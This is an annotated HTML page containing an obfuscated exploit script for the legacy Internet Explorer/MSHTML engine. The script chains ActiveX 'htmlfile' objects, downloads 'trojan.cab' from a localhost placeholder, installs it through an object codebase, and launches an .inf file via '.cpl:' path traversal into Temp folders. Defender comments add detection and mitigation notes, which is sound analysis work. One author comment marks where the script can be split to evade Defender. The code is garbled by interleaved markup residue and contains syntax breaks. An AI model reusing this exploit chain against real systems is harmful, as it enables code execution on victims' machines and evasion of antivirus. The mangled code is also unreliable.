<!DOCTYPE html><font><
/
font>
<html><font><
/
font>
<head><font><
/
font>
<!-- Defender note: "Expires: -1" marks the response as already expired, and
     "X-UA-Compatible: IE=11" asks the Internet Explorer / MSHTML engine to render in
     IE11 document mode. Neither header is malicious on its own, but combined with the
     ActiveXObject script later in this page they show the page is aimed at the legacy
     IE rendering engine, not at a modern browser. -->
<meta http
-
equiv
=
"Expires"
content
=
"-1"
><font><
/
font>
<meta http
-
equiv
=
"X-UA-Compatible"
content
=
"IE=11"
><font><
/
font>
<
/
head><font><
/
font>
<body><font><
/
font>
<script><font><
/
font>
// Defender annotation of an obfuscated inline script that drives the legacy
// Internet Explorer (MSHTML) engine through ActiveX 'htmlfile' objects, a CAB
// referenced by an <object codebase=...>, and '.cpl:' locations that point at
// an .inf file. The code is left exactly as extracted: markup residue is
// interleaved with the tokens, so it is annotated as an analysis specimen
// rather than rewritten.
// Obfuscation pattern throughout: every DOM call is spelled as
// window['Type']['prototype']['method']['call'](target, ...) with string keys.
// NOTE(review): presumably meant to defeat plain-text signatures; normalise
// bracket/string property access before matching.
function(){<font><
/
font>
// Stage 1: append a freshly created <iframe> to document.body; if that throws,
// append one to document.documentElement instead.
try
{<font><
/
font>
window[
'HTMLElement'
][
'prototype'
][
'appendChild'
][
'call'
](window[
'document'
][
'body'
],<font><
/
font>
window[
'Document'
][
'prototype'
][
'createElement'
][
'call'
](window[
'document'
],
'iframe'
));<font><
/
font>
}catch(_0x1c747c){<font><
/
font>
window[
'HTMLElement'
][
'prototype'
][
'appendChild'
][
'call'
](window[
'document'
][
'documentElement'
],<font><
/
font>
window[
'Document'
][
'prototype'
][
'createElement'
][
'call'
](window[
'document'
],
'iframe'
));<font><
/
font>
}<font><
/
font>
// Stage 2: instantiate the 'htmlfile' ActiveX object through an iframe's
// contentWindow.ActiveXObject, not the top-level constructor.
// Detection: ActiveXObject('htmlfile') reached via contentWindow or via another
// htmlfile's Script property is rare in legitimate pages.
iframeActxHtml1
=
new window[
'Document'
][
'prototype'
][
'createElement'
][
'call'
](window[
'document'
],
'iframe'
)[
'contentWindow'
][
'ActiveXObject'
](
'htmlfile'
);<font><
/
font>
// Opens and immediately closes the contentDocument of an iframe element.
window[
'Document'
][
'prototype'
][
'createElement'
][
'call'
](window[
'document'
],
'iframe'
)[
'contentDocument'
][
'open'
]()[
'close'
]();<font><
/
font>
// Mirror of stage 1 using removeChild: body first, documentElement on error.
try
{<font><
/
font>
window[
'HTMLElement'
][
'prototype'
][
'removeChild'
][
'call'
](window[
'document'
][
'body'
],<font><
/
font>
window[
'Document'
][
'prototype'
][
'createElement'
][
'call'
](window[
'document'
],
'iframe'
));<font><
/
font>
}catch(_0x5afb73){<font><
/
font>
window[
'HTMLElement'
][
'prototype'
][
'removeChild'
][
'call'
](window[
'document'
][
'documentElement'
],<font><
/
font>
window[
'Document'
][
'prototype'
][
'createElement'
][
'call'
](window[
'document'
],
'iframe'
));<font><
/
font>
}<font><
/
font>
<font><
/
font>
// Stage 3: a chain of nested 'htmlfile' documents. Each new object is requested
// from the previous one's Script.ActiveXObject, then opened and closed.
// The ProgID appears as both 'htmlfile' and 'htmlFile'; ProgIDs are
// case-insensitive, so match them case-insensitively.
iframeActxHtml1[
'open'
]()[
'close'
]();<font><
/
font>
var iframeActxHtml2
=
iframeActxHtml1[
'Script'
][
'ActiveXObject'
)](
'htmlFile'
);<font><
/
font>
iframeActxHtml2[
'open'
]()[
'close'
]();<font><
/
font>
iframeActxHtml3
=
iframeActxHtml2[(
'Script'
)][
'ActiveXObject'
](
'htmlFile'
);<font><
/
font>
iframeActxHtml3[
'open'
]()[
'close'
]();<font><
/
font>
var iframeActxHtml4
=
new iframeActxHtml3[
'Script'
][(
'ActiveXObject'
)](
'htmlFile'
);<font><
/
font>
iframeActxHtml4[
'open'
]()[
'close'
]();<font><
/
font>
// Stage 4: six more 'htmlfile' objects created directly with new ActiveXObject.
// They are used further down as the targets of the '.cpl:' location assignments.
var actx_html_0
=
new ActiveXObject(
'htmlfile'
),<font><
/
font>
actx_html_1
=
new ActiveXObject(
'htmlfile'
),<font><
/
font>
actx_html_2
=
new ActiveXObject(
'htmlfile'
),<font><
/
font>
actx_html_3
=
new ActiveXObject(
'htmlfile'
),<font><
/
font>
actx_html_4
=
new ActiveXObject(
'htmlfile'
),<font><
/
font>
actx_html_5
=
new ActiveXObject(
'htmlfile'
),<font><
/
font>
xmlhttpreq1
=
new window[
'XMLHttpRequest'
](),<font><
/
font>
// window.setTimeout is assigned to itself: no functional effect as written.
// NOTE(review): the author's comment just below (in Chinese) marks this point as a
// place where the script can be split to get past Defender; signatures should not
// depend on these statements staying adjacent or in one script block.
window[
'setTimeout'
]
=
window[
'setTimeout'
];
/
/
此处可拆分过defender<font><
/
font>
// Stage 5: XMLHttpRequest GET for the CAB. The third argument to open() is ![],
// which evaluates to false, so the request is synchronous.
// Network indicator: a .cab fetched by script from a page rendered in IE mode.
// NOTE(review): 'localhost' looks like a lab placeholder host; confirm before
// treating the URL as an IoC.
window[
'XMLHttpRequest'
][
'prototype'
][
'open'
][
'call'
](xmlhttpreq1,
'GET'
,
'http://localhost/trojan.cab'
,![]),<font><
/
font>
window[
'XMLHttpRequest'
][
'prototype'
][
'send'
][
'call'
](xmlhttpreq1),<font><
/
font>
// Stage 6: inside the innermost htmlfile document, write a <body>, create an
// <object> element, set codebase to the CAB URL (with a '#version=' fragment) and
// classid to a CLSID, then append the element to that body.
// 'codebase' on <object> is the legacy ActiveX install-on-demand mechanism.
// Mitigation: keep MSHTML patched, and disable ActiveX control download and
// installation where IE mode or embedded MSHTML rendering is still reachable.
iframeActxHtml4[
'Script'
][
'document'
][
'write'
](
'<body>'
);<font><
/
font>
var cabloadunpack
=
window[
'Document'
][
'prototype'
][
'createElement'
][
'call'
](iframeActxHtml4[
'Script'
][
'document'
],
'object'
);<font><
/
font>
cabloadunpack[
'setAttribute'
](
'codebase'
,
'http://localhost/trojan.cab#version=5,0,0,0'
);<font><
/
font>
cabloadunpack[
'setAttribute'
](
'classid'
,
'CLSID:b7771b25-4e74-4168-add9-04062d629d9a'
),<font><
/
font>
window[
'HTMLElement'
][
'prototype'
][
'appendChild'
][
'call'
](iframeActxHtml4[
'Script'
][
'document'
][
'body'
],cabloadunpack),<font><
/
font>
<font><
/
font>
// Stage 7: Script.location of the htmlfile objects is assigned '.cpl:' values:
// first '.cpl:123' nine times on actx_html_0, then relative paths that climb with
// '../' to a file named whoiam.inf under AppData/Local/Temp, Temp/Low and
// neighbouring directories.
// NOTE(review): the varying '../' depths are presumably guesses at the host
// process's working directory; confirm in a sandbox.
// Detection: '.cpl:' strings that combine '../' traversal with an .inf file in a
// Temp directory, and .inf files appearing in Temp or Temp/Low right after a CAB
// download by a document-rendering process.
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:../../../AppData/Local/Temp/Low/whoiam.inf'
,<font><
/
font>
actx_html_1[
'Script'
][
'location'
]
=
'.cpl:../../../AppData/Local/Temp/whoiam.inf'
,<font><
/
font>
actx_html_2[
'Script'
][
'location'
]
=
'.cpl:../../../../AppData/Local/Temp/Low/whoiam.inf'
,<font><
/
font>
actx_html_3[
'Script'
][
'location'
]
=
'.cpl:../../../../AppData/Local/Temp/whoiam.inf'
,<font><
/
font>
actx_html_4[
'Script'
][
'location'
]
=
'.cpl:../../../../../Temp/Low/whoiam.inf'
,<font><
/
font>
actx_html_3[
'Script'
][
'location'
]
=
'.cpl:../../../../../Temp/whoiam.inf'
,<font><
/
font>
actx_html_3[
'Script'
][
'location'
]
=
'.cpl:../../Low/whoiam.inf'
,<font><
/
font>
actx_html_3[
'Script'
][
'location'
]
=
'.cpl:../../whoiam.inf'
;<font><
/
font>
}();<font><
/
font>
<
/
script><font><
/
font>
<
/
body><font><
/
font>
<
/
html>